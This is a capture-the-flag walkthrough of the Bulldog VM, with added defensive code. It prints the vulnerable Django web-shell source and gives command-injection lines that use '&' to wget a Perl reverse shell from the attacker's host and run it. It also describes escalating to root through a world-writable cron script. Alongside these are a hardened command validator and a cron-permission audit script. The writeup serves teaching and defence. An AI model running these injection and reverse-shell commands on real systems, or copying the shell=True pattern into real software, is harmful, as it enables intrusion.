Created by Nick Frichette

Software used: nmap, dirbuster, netcat

Nmap showed SSH running on the typical telnet port and two Python-based HTTP servers on ports 80 and 8080.

Visiting the web server on port 80 gave nothing of value. Running dirbuster against it turned up a few interesting directories.

The /dev/ directory showed a page with a link to a strange, non-functioning site.

The page source showed a couple of possible usernames (the part before each @) and an MD5 hash for each user. Searching Google for each hash revealed that the hashed word for nick was “bulldog”.

/admin/ was a Django login page. Logging in as nick with the password “bulldog” worked.

The actual site didn’t have any functionality.

Looking around further and revisiting the web-shell link on “/dev/” showed that the web-shell page had changed: it now offered a kind of web shell with a few commands and a textarea for the output. Trying to chain two commands with “;” didn't work. Browsing around the filesystem turned up the source of the Django application in the file “views.py”:

from django.shortcuts import render
import subprocess

# Allowlist of command names; validate() only checks for these as substrings.
commands = ['ifconfig', 'ls', 'echo', 'pwd', 'cat', 'rm']

def homepage(request):
    return render(request, 'index.html')

def notice(request):
    return render(request, 'notice.html')

def dev(request):
    return render(request, 'dev.html')

def shell(request):
    if request.method == "POST":
        command = request.POST.get("command", None)
        to_return = "Command : " + command + "\n\n"

        if validate(command):
            # The whole string is handed to /bin/sh, so every shell
            # metacharacter that validate() does not reject is honoured.
            execute = subprocess.check_output(command, shell=True)
            to_return += execute.decode()  # check_output returns bytes under Python 3
        elif ";" in command:
            to_return += "INVALID COMMAND. I CAUGHT YOU HACKER! ';' CAN BE USED TO EXECUTE MULTIPLE COMMANDS!!"
        else:
            to_return += "INVALID COMMAND. I CAUGHT YOU HACKER!"

        context = {'data': to_return}
        return render(request, 'shell.html', context)
    return render(request, 'shell.html')

def validate(command):
    # Substring match against the allowlist, plus a denylist of exactly one
    # character: any other shell operator passes straight through.
    if any(com in command for com in commands) and ";" not in command:
        return True
    return False

From the source I could see that the program wasn't guarded against “&”. The check only looks for an allowed command name somewhere in the string, so as long as an allowed command appeared anywhere on the command line and there was no “;”, anything else could follow after an “&”.
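To make the weakness concrete, here is an added example (not code from the writeup or from the Bulldog VM) that puts the views.py check next to a hardened version. validate_weak reproduces the substring-plus-“;” logic above; validate_strict tokenizes the input the way a POSIX shell would, requires the first word to be exactly an allowlisted program, rejects any shell operator token, and run_command then executes the argument list with shell=False so nothing is ever interpreted by /bin/sh. The allowlist is the one from views.py; the sample commands are constructed for the demonstration.

```python
import shlex
import subprocess

# Same allowlist as the Bulldog views.py shown above.
COMMANDS = ['ifconfig', 'ls', 'echo', 'pwd', 'cat', 'rm']

# Shell operators that shlex (with punctuation_chars=True) splits out as
# their own tokens, even when they are glued to a word like "ls&&id".
OPERATORS = set('();<>|&')


def validate_weak(command):
    """The check from views.py: substring match plus a ';' denylist.
    "false" passes because it contains "ls"; "ls & anything" passes too."""
    return any(com in command for com in COMMANDS) and ";" not in command


def tokenize(command):
    """Split like a POSIX shell, keeping operators as separate tokens.
    Raises ValueError on unbalanced quotes (needs Python 3.8+ for
    punctuation_chars together with whitespace_split)."""
    lexer = shlex.shlex(command, posix=True, punctuation_chars=True)
    lexer.whitespace_split = True
    return list(lexer)


def validate_strict(command):
    """Hardened check: the program name must equal an allowlisted entry
    and no token may be a bare shell operator."""
    try:
        tokens = tokenize(command)
    except ValueError:
        return False
    if not tokens or tokens[0] not in COMMANDS:
        return False
    return not any(tok and set(tok) <= OPERATORS for tok in tokens)


def run_command(command, timeout=5):
    """Run an allowlisted command without a shell. Anything that survives
    validation (e.g. a quoted "a&b") reaches the program as a literal
    argument rather than being parsed by /bin/sh."""
    if not validate_strict(command):
        raise ValueError("command rejected: %r" % command)
    result = subprocess.run(tokenize(command), shell=False,
                            capture_output=True, text=True, timeout=timeout)
    return result.stdout


if __name__ == '__main__':
    # Constructed inputs: a benign command, a substring false positive,
    # and an operator-chained command line.
    for sample in ['echo hello', 'false', 'ls & curl http://example.invalid/x']:
        print('%-40r weak=%-5s strict=%s' % (sample, validate_weak(sample),
                                             validate_strict(sample)))
    print(run_command('echo "a&b"'), end='')
```

Exact-matching argv[0] and dropping shell=True closes the “&” hole and every sibling of it (“|”, “&&”, backticks, “$(…)”), but it does not make the allowlist itself safe: with cat and rm on the list a user can still read or delete whatever the django account can reach, so the argument paths need their own validation on top of this.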

So the easy route was to wget a reverse shell and run it. First I needed a Python HTTP server to serve a Perl reverse shell. I then ran “ls & wget http://192.168.1.38:8000/perl-reverse-shell.pl -O /home/django” in the web shell, followed by “ls & perl /home/django/perl-reverse-shell.pl” to connect back to an already running netcat listener on my workstation.

And we got a shell, this time running as the user “django”.

Looking for a way to escalate privileges, I found the cron job in /etc/cron.d/runAV, which ran a Python script every minute as root. The script didn't do anything, and its permissions allowed anyone to edit it.
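This is a misconfiguration worth checking for on any host you defend: a cron.d job running as root whose target file can be modified by a less privileged account. The following added audit script (mine, not part of the writeup) parses /etc/cron.d-style entries, works out which file cron will actually execute (the program itself, or the script passed to an interpreter such as python), and flags targets that are world-writable or not owned by root while the job runs as root. The sample cron file and permission table are constructed for the example; the script path in them is a placeholder, since the writeup only names the cron file, not the script.

```python
import os
import stat

INTERPRETERS = {'python', 'python2', 'python3', 'sh', 'bash', 'perl'}


def parse_cron_d(text):
    """Yield (user, argv) for each job in /etc/cron.d syntax:
    five schedule fields (or one @-keyword), then the user, then the command."""
    for raw in text.splitlines():
        fields = raw.split()
        if not fields or fields[0].startswith('#') or '=' in fields[0]:
            continue  # blank line, comment, or VAR=value assignment
        nsched = 1 if fields[0].startswith('@') else 5
        if len(fields) < nsched + 2:
            continue
        yield fields[nsched], fields[nsched + 1:]


def script_path(argv):
    """The file cron really runs: for 'python foo.py' that is foo.py."""
    if os.path.basename(argv[0]) in INTERPRETERS:
        for arg in argv[1:]:
            if not arg.startswith('-'):
                return arg
    return argv[0]


def find_risky_jobs(cron_text, stat_fn):
    """Return [(user, path, reason)] for jobs whose target could be edited
    by someone other than the job owner. stat_fn(path) -> (mode, uid) or None."""
    findings = []
    for user, argv in parse_cron_d(cron_text):
        path = script_path(argv)
        info = stat_fn(path)
        if info is None:
            continue
        mode, uid = info
        if mode & stat.S_IWOTH:
            findings.append((user, path, 'world-writable'))
        elif user == 'root' and uid != 0:
            findings.append((user, path, 'owned by uid %d but runs as root' % uid))
    return findings


def real_stat(path):
    """stat_fn backed by the live filesystem."""
    try:
        st = os.stat(path)
    except OSError:
        return None
    return st.st_mode, st.st_uid


def scan_cron_d(directory='/etc/cron.d'):
    """Audit every file in a cron.d directory on the current host."""
    findings = []
    for name in sorted(os.listdir(directory)):
        with open(os.path.join(directory, name)) as fh:
            findings.extend(find_risky_jobs(fh.read(), real_stat))
    return findings


# Constructed sample in the shape of the runAV job the writeup describes
# (the script path is a placeholder, not the VM's real one).
SAMPLE_CRON = """\
# run the AV check every minute
SHELL=/bin/sh
* * * * * root /usr/bin/python /opt/example/av-scan.py
@daily root /usr/local/bin/rotate-logs
"""

# Constructed permission table standing in for os.stat(): (st_mode, st_uid).
SAMPLE_STAT = {
    '/opt/example/av-scan.py': (0o100777, 0),       # -rwxrwxrwx, owned by root
    '/usr/local/bin/rotate-logs': (0o100755, 0),    # -rwxr-xr-x, owned by root
}

if __name__ == '__main__':
    for finding in find_risky_jobs(SAMPLE_CRON, SAMPLE_STAT.get):
        print(finding)
```

Run scan_cron_d() on a real host to get the same findings for /etc/cron.d; the fix for a hit is to make the target root-owned and writable only by root (and to treat the directory it lives in the same way, since a writable parent directory lets the file be replaced).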

So I imported the Python os module to get the os.system function, then added a line that executed a new reverse shell I had already fetched with wget.

After a minute the new reverse shell connected back to my new netcat session. This time I had root and was able to read the flag.